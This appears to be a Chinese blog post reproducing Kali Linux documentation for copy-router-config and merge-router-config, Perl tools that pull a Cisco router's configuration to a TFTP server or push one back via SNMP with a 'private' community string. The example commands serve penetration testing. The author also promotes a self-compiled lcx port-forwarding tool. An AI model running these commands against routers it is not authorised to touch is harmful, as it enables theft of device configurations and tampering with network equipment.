kali信息蒐集工具之copy-router-config

Copies configuration files from Cisco devices running SNMP.

額,說白了就是一個TFT服務轉發工具,在這裏推薦下lcx,目前這款工具我已經編譯成windos,linux,嵌入式設備都可用的端口轉發工具,在我的下載裏面就有哦,非常好用

Tools included in the copy-router-config package

copy-router-config.pl – Copies Cisco configs via SNMP

root@kali:~# copy-router-config.pl

#

Copy Cisco Router config - Using SNMP

Hacked up by muts - [email protected]

#

Usage : ./copy-copy-config.pl

Make sure a TFTP server is set up, preferably running from /tmp !
[/toggle] [toggle title=”merge-router-config.pl – Merges Cisco configs via SNMP” variation=”deepblue”]
root@kali:~# merge-router-config.pl

#

Merge Cisco Router config - Using SNMP

Hacked up by muts - [email protected]

#

Usage : ./merge-copy-config.pl

Make sure a TFTP server is set up, preferably running from /tmp !
copy-router-config Usage Example

Copy the config from the router (192.168.1.1) to the TFTP server (192.168.1.15), authenticating with the community string (private):

root@kali:~# copy-router-config.pl 192.168.1.1 192.168.1.15 private
merge-router-config Usage Example(s)

Merge the config with the router (192.168.1.1), copying from the TFTP server (192.168.1.15), using the community string (private):

root@kali:~# merge-router-config.pl 192.168.1.1 192.168.1.15 private

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章